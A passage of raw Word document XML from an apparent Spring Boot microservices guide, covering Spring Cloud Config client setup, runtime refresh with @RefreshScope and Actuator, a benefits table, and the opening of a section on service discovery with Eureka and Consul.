    <w:p w14:paraId="1B1E9183" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C010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lient bootstrap.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CE5E3B" w14:textId="77777777" w:rsidR="005D6B26" w:rsidRPr="00CE4B95"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15487"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1201C7EA" w14:textId="77777777" w:rsidR="005D6B26" w:rsidRPr="00CE4B95"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15487"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  application</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695F249C" w14:textId="77777777" w:rsidR="005D6B26" w:rsidRPr="00CE4B95"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15487"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    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us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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020C7541" w14:textId="77777777" w:rsidR="005D6B26" w:rsidRPr="00CE4B95"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15487"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FAE667" w14:textId="77777777" w:rsidR="005D6B26" w:rsidRPr="00CE4B95"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15487"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    config</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E65C234" w14:textId="77777777" w:rsidR="005D6B26" w:rsidRPr="00CE4B95"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15487"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      uri</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http</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//localhost:8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C86B8" w14:textId="36634264" w:rsidR="005D6B26" w:rsidRPr="00CE4B95"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15487"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      profil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dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B89F60" w14:textId="43A7AE16" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C6EBB5" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95"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C369B5">
          <v:rect id="_x0000_i2790" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4D63AE" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C0100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Refresh Config at Runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F5FDC1" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C010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Add this to your microservice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A8212F" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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plementation 'org.springframework.boot:spring-boot-starter-actuator'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150DE849" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C010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nable refresh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF171A" w14:textId="77777777" w:rsidR="005D6B26" w:rsidRPr="00CE4B95"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8795619"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>@RefreshScope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442621A1" w14:textId="77777777" w:rsidR="005D6B26" w:rsidRPr="00CE4B95"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8795619"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E4E785" w14:textId="77777777" w:rsidR="005D6B26" w:rsidRPr="00CE4B95"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8795619"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>publi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clas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omeControll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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39929E7A" w14:textId="77777777" w:rsidR="005D6B26" w:rsidRPr="00CE4B95"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879561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Value</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custom.property}"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D67AE6" w14:textId="77777777" w:rsidR="005D6B26" w:rsidRPr="00CE4B95"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8795619"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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priv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value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3836C" w14:textId="59C54953" w:rsidR="005D6B26" w:rsidRPr="00CE4B95"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8795619"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A917858" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">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all:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E78C502" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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OST http://localhost:{port}/actuator/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2AC5F5" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95"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6BAFE87">
          <v:rect id="_x0000_i2791" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F8EE85" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">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Benefits of Spring Cloud Confi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33"/>
        <w:gridCol w:w="4643"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C01003" w:rsidRPr="00CE4B95" w14:paraId="685109EC" w14:textId="77777777" w:rsidTr="00C01003">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59E325BA" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="005D6B26">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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A2B405C" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="005D6B26">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Benefit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C01003" w:rsidRPr="00CE4B95" w14:paraId="199F166E" w14:textId="77777777" w:rsidTr="00C01003">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07F6905C" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">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Centralized Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="190CC2EF" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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e place to manage all properties</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C01003" w:rsidRPr="00CE4B95" w14:paraId="68683C65" w14:textId="77777777" w:rsidTr="00C01003">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="072C3801" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">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Git-based Versioning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="466D4120" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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ollbacks &amp; audits made easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C01003" w:rsidRPr="00CE4B95" w14:paraId="25131F81" w14:textId="77777777" w:rsidTr="00C01003">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01E1CB62" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">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Dynamic Refreshing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E44162A" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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restarts needed (with @RefreshScope)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C01003" w:rsidRPr="00CE4B95" w14:paraId="3CB565CA" w14:textId="77777777" w:rsidTr="00C01003">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69AC64F6" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">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Environment Specific Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15AA2E0D" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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pports dev, test, prod environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C01003" w:rsidRPr="00CE4B95" w14:paraId="3DF0FA8D" w14:textId="77777777" w:rsidTr="00C01003">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="160ED1A6" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">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Integrates with Eureka etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="518D89EC" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01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orks seamlessly with other Spring Cloud modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60C8C890" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95"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EC3363D">
          <v:rect id="_x0000_i2792" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C3383F" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C0100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Advanced Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09518D00" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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pport for Vault for secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189AF0C0" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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pull config from file system, Git, SVN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B12AEA0" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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 be secured with OAuth2 or JWT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C1DE6E" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>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orks well with Spring Boot Admin and Actuator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F058B" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95"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04C103">
          <v:rect id="_x0000_i2793" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42046855" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">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nclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E235F9E" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">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pring Cloud Config helps you centralize and manage configurations across all microservices — making your system more flexible, maintainable, and environment-aware. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💼📁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1808F6" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95"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B6D7DDD">
          <v:rect id="_x0000_i2794" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1BF031" w14:textId="7F18D296" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="004D0941">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="677" w:name="_Toc196308157"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Service discovery using Eureka or Consul</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="677"/>
    </w:p>
    <w:p w14:paraId="24AC5A00" w14:textId="150C4DA0" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965" w:rsidP="008B3EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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ervice discovery is a mechanism that allows microservices to automatically discover and communicate with each other without needing hardcoded configurations for the service locations (IP addresses or hostnames). In a microservices architecture, where services can scale dynamically and may change their IP addresses, service discovery ensures that services can find and interact with each other seamlessly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03057B5C"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Two popular tools for service discovery in Spring Boot applications are </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eureka</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consul</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's how both work and how you can use them in your Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A253C" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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1. Eureka (by Netflix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115313BE"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Eureka is a REST-based service that provides service discovery and registration. It's often used in Spring Cloud for microservice architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B29192F" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B8015F"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Service Registration</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Microservices register themselves with Eureka, so other services can discover them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58195AD9"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Service Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Clients can query Eureka to discover instances of services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBF1FA8"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Health Check</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Eureka provides health check functionality, allowing it to determine if a service is still available and remove it from the registry if it fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422E4E4B"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Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
